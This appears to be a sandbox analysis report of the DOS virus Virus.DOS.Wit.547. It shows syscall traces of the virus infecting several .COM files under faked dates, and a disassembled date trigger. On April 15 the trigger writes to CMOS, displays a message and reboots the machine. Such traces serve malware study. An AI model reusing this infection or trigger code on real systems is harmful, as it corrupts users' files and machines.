Sample viewer

vx.netlux.org/Virus.DOS.Wit.547

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:48:12.759595571Z 26 PC: 12a71 | Set disk transfer address
2018-12-17T22:48:12.761094226Z 71 PC: 12a83 | Get current directory
2018-12-17T22:48:12.764671754Z 42 PC: 12a89 | Get date
0x12a89: cmp dh, 4
0x12a8c: jne 0x12aa7
0x12a8e: cmp dl, 0xf
0x12a91: jne 0x12aa7
0x12a93: mov ax, 0x1010
0x12a96: out 0x70, ax
0x12a98: mov dx, 0x2ee
0x12a9b: mov ah, 9
0x12a9d: int 0x21
0x12a9f: mov ah, 8
0x12aa1: int 0x21
0x12aa3: mov al, 0xfe
0x12aa5: out 0x64, al
0x12aa7: mov ah, byte ptr [0x318]
0x12aab: mov cl, 7
0x12aad: mov dx, 0x2e2
0x12ab0: int 0x21
0x12ab2: jae 0x12ab7
0x12ab4: jmp 0x12be0
0x12ab7: mov dx, word ptr [0x311]
2018-12-17T22:48:12.766968303Z 78 PC: 12ab2 | Find first file
2018-12-17T22:48:12.773714048Z 67 PC: 12ace | Get or set file attributes
2018-12-17T22:48:12.793028582Z 61 PC: 12ae2 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:48:12.800526875Z 63 PC: 12aff | Read file or device (Read 595 bytes on handle 5)
2018-12-17T22:48:12.808010541Z 66 PC: 12b1e | Move file pointer
2018-12-17T22:48:12.817667001Z 66 PC: 12b40 | Move file pointer
2018-12-17T22:48:12.819427303Z 64 PC: 12b5b | Write file or device (Write 407 bytes on handle 5)
2018-12-17T22:48:12.82474565Z 66 PC: 12b8b | Move file pointer
2018-12-17T22:48:12.827207578Z 64 PC: 12b9d | Write file or device (Write 595 bytes on handle 5)
2018-12-17T22:48:12.835294234Z 87 PC: 12bae | Get or set file date and time
2018-12-17T22:48:12.837775342Z 62 PC: 12bb4 | Close file
2018-12-17T22:48:12.848100882Z 67 PC: 12bc6 | Get or set file attributes
2018-12-17T22:48:12.859328518Z 79 PC: 12ab2 | Find next file
2018-12-17T22:48:12.862469955Z 67 PC: 12ace | Get or set file attributes
2018-12-17T22:48:12.873467515Z 61 PC: 12ae2 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:48:12.88113388Z 63 PC: 12aff | Read file or device (Read 595 bytes on handle 5)
2018-12-17T22:48:12.888823294Z 66 PC: 12b1e | Move file pointer
2018-12-17T22:48:12.890733589Z 66 PC: 12b40 | Move file pointer
2018-12-17T22:48:12.892737511Z 64 PC: 12b5b | Write file or device (Write 27 bytes on handle 5)
2018-12-17T22:48:12.897262955Z 66 PC: 12b8b | Move file pointer
2018-12-17T22:48:12.898909232Z 64 PC: 12b9d | Write file or device (Write 595 bytes on handle 5)
2018-12-17T22:48:12.907334859Z 87 PC: 12bae | Get or set file date and time
2018-12-17T22:48:12.909454213Z 62 PC: 12bb4 | Close file
2018-12-17T22:48:12.918052345Z 67 PC: 12bc6 | Get or set file attributes
2018-12-17T22:48:12.929194707Z 79 PC: 12ab2 | Find next file
2018-12-17T22:48:12.932479946Z 67 PC: 12ace | Get or set file attributes
2018-12-17T22:48:12.943350679Z 61 PC: 12ae2 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:48:12.952263128Z 63 PC: 12aff | Read file or device (Read 595 bytes on handle 5)
2018-12-17T22:48:12.960038712Z 66 PC: 12b1e | Move file pointer
2018-12-17T22:48:12.961770358Z 66 PC: 12b40 | Move file pointer
2018-12-17T22:48:12.964606567Z 64 PC: 12b5b | Write file or device (Write 92 bytes on handle 5)
2018-12-17T22:48:12.969749907Z 66 PC: 12b8b | Move file pointer
2018-12-17T22:48:12.972613393Z 64 PC: 12b9d | Write file or device (Write 595 bytes on handle 5)
2018-12-17T22:48:12.981548715Z 87 PC: 12bae | Get or set file date and time
2018-12-17T22:48:12.983702793Z 62 PC: 12bb4 | Close file
2018-12-17T22:48:12.992705677Z 67 PC: 12bc6 | Get or set file attributes
2018-12-17T22:48:13.004494111Z 79 PC: 12ab2 | Find next file
2018-12-17T22:48:13.007887741Z 67 PC: 12ace | Get or set file attributes
2018-12-17T22:48:13.019741686Z 61 PC: 12ae2 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:48:13.02716149Z 63 PC: 12aff | Read file or device (Read 595 bytes on handle 5)
2018-12-17T22:48:13.034953947Z 66 PC: 12b1e | Move file pointer
2018-12-17T22:48:13.036534488Z 66 PC: 12b40 | Move file pointer
2018-12-17T22:48:13.038120678Z 64 PC: 12b5b | Write file or device (Write 29 bytes on handle 5)
2018-12-17T22:48:13.044064824Z 66 PC: 12b8b | Move file pointer
2018-12-17T22:48:13.046137609Z 64 PC: 12b9d | Write file or device (Write 595 bytes on handle 5)
2018-12-17T22:48:13.055905113Z 87 PC: 12bae | Get or set file date and time
2018-12-17T22:48:13.058681041Z 62 PC: 12bb4 | Close file
2018-12-17T22:48:13.067653794Z 67 PC: 12bc6 | Get or set file attributes
2018-12-17T22:48:13.078531856Z 79 PC: 12ab2 | Find next file
2018-12-17T22:48:13.082145364Z 67 PC: 12ace | Get or set file attributes
2018-12-17T22:48:13.094636989Z 61 PC: 12ae2 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:48:13.102477877Z 63 PC: 12aff | Read file or device (Read 595 bytes on handle 5)
2018-12-17T22:48:13.110672874Z 66 PC: 12b1e | Move file pointer
2018-12-17T22:48:13.112266305Z 66 PC: 12b40 | Move file pointer
2018-12-17T22:48:13.113924941Z 64 PC: 12b5b | Write file or device (Write 29 bytes on handle 5)
2018-12-17T22:48:13.118734848Z 66 PC: 12b8b | Move file pointer
2018-12-17T22:48:13.120510461Z 64 PC: 12b9d | Write file or device (Write 595 bytes on handle 5)
2018-12-17T22:48:13.128834499Z 87 PC: 12bae | Get or set file date and time
2018-12-17T22:48:13.130802448Z 62 PC: 12bb4 | Close file
2018-12-17T22:48:13.140499209Z 67 PC: 12bc6 | Get or set file attributes
2018-12-17T22:48:13.151891571Z 59 PC: 12be9 | Change current directory
2018-12-17T22:48:13.157667418Z 26 PC: 12c06 | Set disk transfer address
2018-12-17T22:48:13.159976335Z 59 PC: 12c11 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9474,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:23:13.925736108Z 26 PC: 12a71 | Set disk transfer address
2018-12-25T12:23:13.927488123Z 71 PC: 12a83 | Get current directory
2018-12-25T12:23:13.931028576Z 42 PC: 12a89 | Get date
0x12a89: cmp dh, 4
0x12a8c: jne 0x12aa7
0x12a8e: cmp dl, 0xf
0x12a91: jne 0x12aa7
0x12a93: mov ax, 0x1010
0x12a96: out 0x70, ax
0x12a98: mov dx, 0x2ee
0x12a9b: mov ah, 9
0x12a9d: int 0x21
0x12a9f: mov ah, 8
0x12aa1: int 0x21
0x12aa3: mov al, 0xfe
0x12aa5: out 0x64, al
0x12aa7: mov ah, byte ptr [0x318]
0x12aab: mov cl, 7
0x12aad: mov dx, 0x2e2
0x12ab0: int 0x21
0x12ab2: jae 0x12ab7
0x12ab4: jmp 0x12be0
0x12ab7: mov dx, word ptr [0x311]
2018-12-25T12:23:13.933664626Z 78 PC: 12ab2 | Find first file
2018-12-25T12:23:13.940900208Z 67 PC: 12ace | Get or set file attributes
2018-12-25T12:23:13.965757315Z 61 PC: 12ae2 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:23:13.973743743Z 63 PC: 12aff | Read file or device (Read 595 bytes on handle 5)
2018-12-25T12:23:13.98074226Z 66 PC: 12b1e | Move file pointer
2018-12-25T12:23:13.982976139Z 66 PC: 12b40 | Move file pointer
2018-12-25T12:23:13.984666761Z 64 PC: 12b5b | Write file or device (Write 407 bytes on handle 5)
2018-12-25T12:23:13.989048442Z 66 PC: 12b8b | Move file pointer
2018-12-25T12:23:13.991023885Z 64 PC: 12b9d | Write file or device (Write 595 bytes on handle 5)
2018-12-25T12:23:13.999045147Z 87 PC: 12bae | Get or set file date and time
2018-12-25T12:23:14.00067118Z 62 PC: 12bb4 | Close file
2018-12-25T12:23:14.009950551Z 67 PC: 12bc6 | Get or set file attributes
2018-12-25T12:23:14.02062633Z 79 PC: 12ab2 | Find next file (See above)
2018-12-25T12:23:14.023614164Z 67 PC: 12ace | Get or set file attributes (See above)
2018-12-25T12:23:14.035748882Z 61 PC: 12ae2 | Open file (See above)
2018-12-25T12:23:14.043346906Z 63 PC: 12aff | Read file or device (See above)
2018-12-25T12:23:14.050930386Z 66 PC: 12b1e | Move file pointer (See above)
2018-12-25T12:23:14.053784123Z 66 PC: 12b40 | Move file pointer (See above)
2018-12-25T12:23:14.058358878Z 64 PC: 12b5b | Write file or device (See above)
2018-12-25T12:23:14.062470882Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:23:14.064351426Z 64 PC: 12b9d | Write file or device (See above)
2018-12-25T12:23:14.073916527Z 87 PC: 12bae | Get or set file date and time (See above)
2018-12-25T12:23:14.075722716Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T12:23:14.083401379Z 67 PC: 12bc6 | Get or set file attributes (See above)
2018-12-25T12:23:14.095100644Z 79 PC: 12ab2 | Find next file (See above)
2018-12-25T12:23:14.098190463Z 67 PC: 12ace | Get or set file attributes (See above)
2018-12-25T12:23:14.109580078Z 61 PC: 12ae2 | Open file (See above)
2018-12-25T12:23:14.117960083Z 63 PC: 12aff | Read file or device (See above)
2018-12-25T12:23:14.125188009Z 66 PC: 12b1e | Move file pointer (See above)
2018-12-25T12:23:14.127127272Z 66 PC: 12b40 | Move file pointer (See above)
2018-12-25T12:23:14.129881673Z 64 PC: 12b5b | Write file or device (See above)
2018-12-25T12:23:14.134968127Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:23:14.136420328Z 64 PC: 12b9d | Write file or device (See above)
2018-12-25T12:23:14.145003025Z 87 PC: 12bae | Get or set file date and time (See above)
2018-12-25T12:23:14.146916417Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T12:23:14.155315658Z 67 PC: 12bc6 | Get or set file attributes (See above)
2018-12-25T12:23:14.167034252Z 79 PC: 12ab2 | Find next file (See above)
2018-12-25T12:23:14.17109896Z 67 PC: 12ace | Get or set file attributes (See above)
2018-12-25T12:23:14.183297179Z 61 PC: 12ae2 | Open file (See above)
2018-12-25T12:23:14.191081731Z 63 PC: 12aff | Read file or device (See above)
2018-12-25T12:23:14.19949022Z 66 PC: 12b1e | Move file pointer (See above)
2018-12-25T12:23:14.201783814Z 66 PC: 12b40 | Move file pointer (See above)
2018-12-25T12:23:14.203871813Z 64 PC: 12b5b | Write file or device (See above)
2018-12-25T12:23:14.210076921Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:23:14.211645097Z 64 PC: 12b9d | Write file or device (See above)
2018-12-25T12:23:14.220458676Z 87 PC: 12bae | Get or set file date and time (See above)
2018-12-25T12:23:14.22261543Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T12:23:14.227791589Z 67 PC: 12bc6 | Get or set file attributes (See above)
2018-12-25T12:23:14.234937703Z 79 PC: 12ab2 | Find next file (See above)
2018-12-25T12:23:14.237666972Z 67 PC: 12ace | Get or set file attributes (See above)
2018-12-25T12:23:14.244877936Z 61 PC: 12ae2 | Open file (See above)
2018-12-25T12:23:14.249149853Z 63 PC: 12aff | Read file or device (See above)
2018-12-25T12:23:14.254030452Z 66 PC: 12b1e | Move file pointer (See above)
2018-12-25T12:23:14.255973684Z 66 PC: 12b40 | Move file pointer (See above)
2018-12-25T12:23:14.257347168Z 64 PC: 12b5b | Write file or device (See above)
2018-12-25T12:23:14.26034323Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:23:14.262113203Z 64 PC: 12b9d | Write file or device (See above)
2018-12-25T12:23:14.267264999Z 87 PC: 12bae | Get or set file date and time (See above)
2018-12-25T12:23:14.26882844Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T12:23:14.277973384Z 67 PC: 12bc6 | Get or set file attributes (See above)
2018-12-25T12:23:14.28917378Z 59 PC: 12be9 | Change current directory
2018-12-25T12:23:14.299889415Z 26 PC: 12c06 | Set disk transfer address
2018-12-25T12:23:14.301815071Z 59 PC: 12c11 | Change current directory

{"DateBased":true,"Day":1,"Month":4,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9474,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:23:14.115311028Z 26 PC: 12a71 | Set disk transfer address
2018-12-25T12:23:14.117151704Z 71 PC: 12a83 | Get current directory
2018-12-25T12:23:14.120494133Z 42 PC: 12a89 | Get date
0x12a89: cmp dh, 4
0x12a8c: jne 0x12aa7
0x12a8e: cmp dl, 0xf
0x12a91: jne 0x12aa7
0x12a93: mov ax, 0x1010
0x12a96: out 0x70, ax
0x12a98: mov dx, 0x2ee
0x12a9b: mov ah, 9
0x12a9d: int 0x21
0x12a9f: mov ah, 8
0x12aa1: int 0x21
0x12aa3: mov al, 0xfe
0x12aa5: out 0x64, al
0x12aa7: mov ah, byte ptr [0x318]
0x12aab: mov cl, 7
0x12aad: mov dx, 0x2e2
0x12ab0: int 0x21
0x12ab2: jae 0x12ab7
0x12ab4: jmp 0x12be0
0x12ab7: mov dx, word ptr [0x311]
2018-12-25T12:23:14.122889363Z 78 PC: 12ab2 | Find first file
2018-12-25T12:23:14.129795734Z 67 PC: 12ace | Get or set file attributes
2018-12-25T12:23:14.151859067Z 61 PC: 12ae2 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:23:14.159886721Z 63 PC: 12aff | Read file or device (Read 595 bytes on handle 5)
2018-12-25T12:23:14.16744654Z 66 PC: 12b1e | Move file pointer
2018-12-25T12:23:14.170687176Z 66 PC: 12b40 | Move file pointer
2018-12-25T12:23:14.172642225Z 64 PC: 12b5b | Write file or device (Write 407 bytes on handle 5)
2018-12-25T12:23:14.177403545Z 66 PC: 12b8b | Move file pointer
2018-12-25T12:23:14.180848415Z 64 PC: 12b9d | Write file or device (Write 595 bytes on handle 5)
2018-12-25T12:23:14.194517913Z 87 PC: 12bae | Get or set file date and time
2018-12-25T12:23:14.196471593Z 62 PC: 12bb4 | Close file
2018-12-25T12:23:14.206152512Z 67 PC: 12bc6 | Get or set file attributes
2018-12-25T12:23:14.217965125Z 79 PC: 12ab2 | Find next file (See above)
2018-12-25T12:23:14.220908783Z 67 PC: 12ace | Get or set file attributes (See above)
2018-12-25T12:23:14.232910966Z 61 PC: 12ae2 | Open file (See above)
2018-12-25T12:23:14.241308126Z 63 PC: 12aff | Read file or device (See above)
2018-12-25T12:23:14.248406189Z 66 PC: 12b1e | Move file pointer (See above)
2018-12-25T12:23:14.249747897Z 66 PC: 12b40 | Move file pointer (See above)
2018-12-25T12:23:14.252058732Z 64 PC: 12b5b | Write file or device (See above)
2018-12-25T12:23:14.256481803Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:23:14.257710931Z 64 PC: 12b9d | Write file or device (See above)
2018-12-25T12:23:14.267033348Z 87 PC: 12bae | Get or set file date and time (See above)
2018-12-25T12:23:14.269158916Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T12:23:14.278690331Z 67 PC: 12bc6 | Get or set file attributes (See above)
2018-12-25T12:23:14.295328511Z 79 PC: 12ab2 | Find next file (See above)
2018-12-25T12:23:14.298462937Z 67 PC: 12ace | Get or set file attributes (See above)
2018-12-25T12:23:14.309575957Z 61 PC: 12ae2 | Open file (See above)
2018-12-25T12:23:14.317311272Z 63 PC: 12aff | Read file or device (See above)
2018-12-25T12:23:14.324678584Z 66 PC: 12b1e | Move file pointer (See above)
2018-12-25T12:23:14.32639892Z 66 PC: 12b40 | Move file pointer (See above)
2018-12-25T12:23:14.336643559Z 64 PC: 12b5b | Write file or device (See above)
2018-12-25T12:23:14.342528435Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:23:14.344247091Z 64 PC: 12b9d | Write file or device (See above)
2018-12-25T12:23:14.352581267Z 87 PC: 12bae | Get or set file date and time (See above)
2018-12-25T12:23:14.355083535Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T12:23:14.364686493Z 67 PC: 12bc6 | Get or set file attributes (See above)
2018-12-25T12:23:14.375691949Z 79 PC: 12ab2 | Find next file (See above)
2018-12-25T12:23:14.379728889Z 67 PC: 12ace | Get or set file attributes (See above)
2018-12-25T12:23:14.390877144Z 61 PC: 12ae2 | Open file (See above)
2018-12-25T12:23:14.398385594Z 63 PC: 12aff | Read file or device (See above)
2018-12-25T12:23:14.40739616Z 66 PC: 12b1e | Move file pointer (See above)
2018-12-25T12:23:14.409032231Z 66 PC: 12b40 | Move file pointer (See above)
2018-12-25T12:23:14.410625847Z 64 PC: 12b5b | Write file or device (See above)
2018-12-25T12:23:14.423215513Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:23:14.425281817Z 64 PC: 12b9d | Write file or device (See above)
2018-12-25T12:23:14.433933604Z 87 PC: 12bae | Get or set file date and time (See above)
2018-12-25T12:23:14.436222045Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T12:23:14.446066011Z 67 PC: 12bc6 | Get or set file attributes (See above)
2018-12-25T12:23:14.457022798Z 79 PC: 12ab2 | Find next file (See above)
2018-12-25T12:23:14.459891738Z 67 PC: 12ace | Get or set file attributes (See above)
2018-12-25T12:23:14.471156129Z 61 PC: 12ae2 | Open file (See above)
2018-12-25T12:23:14.479218886Z 63 PC: 12aff | Read file or device (See above)
2018-12-25T12:23:14.487214132Z 66 PC: 12b1e | Move file pointer (See above)
2018-12-25T12:23:14.489109722Z 66 PC: 12b40 | Move file pointer (See above)
2018-12-25T12:23:14.490582766Z 64 PC: 12b5b | Write file or device (See above)
2018-12-25T12:23:14.494426512Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:23:14.496483111Z 64 PC: 12b9d | Write file or device (See above)
2018-12-25T12:23:14.504526575Z 87 PC: 12bae | Get or set file date and time (See above)
2018-12-25T12:23:14.505677138Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T12:23:14.512268616Z 67 PC: 12bc6 | Get or set file attributes (See above)
2018-12-25T12:23:14.52321168Z 59 PC: 12be9 | Change current directory
2018-12-25T12:23:14.527735779Z 26 PC: 12c06 | Set disk transfer address
2018-12-25T12:23:14.529094592Z 59 PC: 12c11 | Change current directory

{"DateBased":true,"Day":15,"Month":4,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9474,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:23:14.287814615Z 26 PC: 12a71 | Set disk transfer address
2018-12-25T12:23:14.29074646Z 71 PC: 12a83 | Get current directory
2018-12-25T12:23:14.293565887Z 42 PC: 12a89 | Get date
0x12a89: cmp dh, 4
0x12a8c: jne 0x12aa7
0x12a8e: cmp dl, 0xf
0x12a91: jne 0x12aa7
0x12a93: mov ax, 0x1010
0x12a96: out 0x70, ax
0x12a98: mov dx, 0x2ee
0x12a9b: mov ah, 9
0x12a9d: int 0x21
0x12a9f: mov ah, 8
0x12aa1: int 0x21
0x12aa3: mov al, 0xfe
0x12aa5: out 0x64, al
0x12aa7: mov ah, byte ptr [0x318]
0x12aab: mov cl, 7
0x12aad: mov dx, 0x2e2
0x12ab0: int 0x21
0x12ab2: jae 0x12ab7
0x12ab4: jmp 0x12be0
0x12ab7: mov dx, word ptr [0x311]
2018-12-25T12:23:14.295666678Z 9 PC: 12a9f | Display string (String= '��ࠡ���� - rulez forever ! ')
2018-12-25T12:23:14.300604146Z 8 PC: 12aa3 | Console input without echo